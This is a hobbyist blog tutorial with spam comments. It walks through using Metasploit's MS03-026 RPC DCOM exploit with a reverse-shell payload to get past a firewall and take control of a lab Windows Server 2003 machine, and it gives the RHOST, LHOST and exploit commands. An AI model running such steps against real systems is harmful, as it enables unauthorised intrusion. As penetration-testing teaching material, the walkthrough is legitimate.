so in my previous post . i give a tutorial how to hack a windows xp sp2 but this is just the tip of the iceberg. last tutorial was so easy because the firewall was down . now i'm goinng to give a tutorial how to bypass the firewall and take control of victim machine because in real life hacking will be much more harder and persistent
before we go to the tutorial you should know what is firewall and the mechanism behind it.
in short explanation firewall is a system that monitors and controls the incoming and outgoing network traffic based on predetermined security rules. every firewall from different vendor have a different set of rules so lets just imagine that firewall as guard who watch all the traffic around your computer.
lets get started
in this tutorial i use windows xp professional as the attacker computer
and windows server 2003 as the target or the victim. so make sure you assign an ip address to each virtual machine and don't forget to turn on the firewall because this is the main point of the tutorial :3
i start my metasploit in my windows xp and in this tutorial i use msrpc_dcom_ms03_026 (cause Buffer Overrun In RPC Interface Could Allow Code Execution) and it affect windows server 2003.
after setting the exploit
type "show payload" to see all compatible payload that is suit with the exploit. now this one is a little bit tricky because not all this exploit will work because there is a firewall that will block the remote execution or the system is already patch.
let me show you if you use the wrong payload
as you can see if you use wrong exploit you will it will give no response.
so my suggestion try to use this exploit "win32_reverse" because basically in firewall it only accept the incoming traffic but don't give response from inside so try to select a payload that will give connection from inside the system that's why it was called reverse because it give reverse connection when the payload is in the system
type "set RHOST"+ target ip address
type "set LHOST"+ your ip address
and don't forget to double check if all necessary parameter is fill
type "exploit" and walllaaa!
you already inside the system
from now on you can do anything to the affected system. hehehehe cool huh?
this tutorial is only for education not for malicious intend
so make sure if you want to hack someone computer let the owner know or you will thrown into jail
have a good day ^_^
We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.
BalasHapusWe will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.
BalasHapusWe will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.
BalasHapus